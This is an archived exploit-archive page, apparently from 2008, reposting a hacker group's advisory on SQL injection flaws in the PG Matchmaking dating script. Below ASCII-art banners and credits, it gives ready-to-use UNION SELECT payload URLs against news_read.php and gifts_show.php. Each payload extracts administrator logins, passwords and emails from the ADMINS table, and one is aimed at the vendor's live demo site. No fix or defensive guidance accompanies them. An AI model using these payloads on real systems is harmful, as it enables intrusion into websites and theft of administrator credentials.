|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home ExploitAlert Database |
|
|
Topic : | PG Matchmaking Script Multiple SQL Injection Vulnerabilities
|
ExploitAlert : 4813
SecurityAlert : 4466 (Exploit Details)
Milw0rm ID : 6626
Credit : Super Cristal
Date : 03.10.2008
Download
Plain text version
 Exploit Code : ===========================================================================
=======================================
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT
EEEEE AA MM MM
S N N N A A K K E S T
E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T
EEEEE AAAAAA M M M M
S N N N A A K K E S T
E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T
EEEEE A A M M
===================================================SNAKES
TEAM====================================================
+
=
= PG Matchmaking Script Multiple Remote SQL Injection
Vulnerability +
+
=
==============================================:::ALGERIAN
HaCkEr:::===============================================
= =
= =
= = Discovered By: Super Cristal
:::ALGERIAN HaCkEr::: = =
=
=
= = ************ ::::::home :
www.snakespc.com/sc::::::*************** = =
=
=
= = :::::Mail:
Super_Cristal@hotmail.com::::::: = =
=
=
= = ::::script Demo:
http://www.datingpro.com/matchmaking/demo::::= =
=
=
======================================Super
Cristal===================================
#product home: datingpro.com
#dork:find it
Exploit(1):
********
http://localhost/[script_path]/news_read.php?id=-20 UNION SELECT
1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
Exploit(2):
http://localhost/[script_path]/gifts_show.php?id=-101 UNION SELECT
1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS--
demo::::
http://www.datingpro.com/matchmaking/demo/news_read.php?id=-20 UNION SELECT
1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
===========================================================================
========================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkE
rS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members
===========================================================================
========================================
::::Super_Cristal@Hotmail.CoM::::
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|
|
|
|